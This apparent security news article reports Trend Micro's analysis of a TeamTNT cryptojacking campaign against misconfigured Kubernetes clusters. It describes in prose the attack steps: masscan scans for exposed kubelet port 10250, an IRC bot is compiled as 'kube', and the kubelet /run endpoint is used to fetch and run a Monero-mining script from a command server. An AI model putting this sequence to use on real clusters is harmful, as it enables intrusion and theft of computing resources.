Researchers from Trend Micro disclosed that close to 50,000 IPs were compromised across multiple Kubernetes clusters in a cryptojacking campaign conducted by the TeamTNT group.
Kubernetes, developed and backed by Google, is one of the most widely adopted container orchestration platforms for automating the deployment, scaling, and management of containerized applications.
It makes an attractive target for threat actors as they are often misconfigured, especially those running primarily in cloud environments with access to nearly infinite resources.
The analysis says, close to 50,000 IPs found compromised by this attack perpetrated by TeamTNT across multiple clusters. More than a few IPs were repeatedly exploited during the timeframe and the majority of the compromised nodes were from China and the US.
How a Kubernetes Cluster is Compromised?
Previously, Trend Micro highlighted that TeamTNT was actively stealing AWS, Docker, and Linux Secure Shell credentials as well waging cryptojacking attacks and placing backdoors – such as IRC bots and remote shells – inside Linux devices.
Researchers at Trend Micro analyzed one of the scripts they collected from a TeamTNT server. “TeamTNT at first wanted to disable the bash history on the target host and define environment variables for its command-and-control server, such as the script to install the crypto miner later and the binary of the XMRig Monero miner”, TrendMicro researchers say.
The script also installs two free, open-source tools available from GitHub, the network scanning tool masscan, developed in C and the banner-grabbing, deprecated Zgrab, developed in Go. The new version Zgrab2 is also open source and available on GitHub but is not installed with the script.
TeamTNT subsequently installs its Internet Relay Chatbot. It is discovered that the IRC bot is written in C and is stored on the /tmp folder under the name kube.c to avoid suspicion.
The bot code is compiled with Gnu Compiler Collection and removed after compiling completes. The resulting binary generated is then moved to the /root folder and renamed to kube.
An IRC bot is a set of scripts or an independent program that connects to Internet Relay Chat as a client, so it appears to other IRC users as another user. The IRC bot used by Team TNT, written in C, is based on another well-known IRC bot called Kaiten. In the last part of the script, a function – kube_pwn() – uses Masscan to check any hosts with port 10250 open.
“Once the connection is established, the attackers then use the Masscan port scanner to scan the internal network of the targeted Kubernetes cluster to look for other unsecured or misconfigured Kubelet agents”, reads the analysis published by Trend Micro.
This port belongs to the kubelet API, and by default, it is open on all nodes of a cluster, including the control plane and worker nodes. Kubelet is the agent that runs on each node and ensures that all containers are running in a pod. It is also the agent that is responsible for any configuration changes on the nodes.
For each container running on each node, it takes advantage of the /run endpoint on the kubelet API to run the following commands:
1. Updates the package index of the container.
2. Installs the following packages: bash, wget and curl.
3. Downloads a shell script called setup_xmr.sh from the TeamTNT C&C server and saves it on the tmp folder.
4. Executes the script to start mining for the Monero cryptocurrency.
Researchers mention that the constant use of crypto-jacking and credential-stealing point out that these will remain in the threat actor’s primary collection of techniques for the near future.
The high number of targets shows that TeamTNT is still expanding its reach (especially in cloud environments) and perhaps infrastructure since the group can monetize a more significant amount from their campaigns with more potential victims.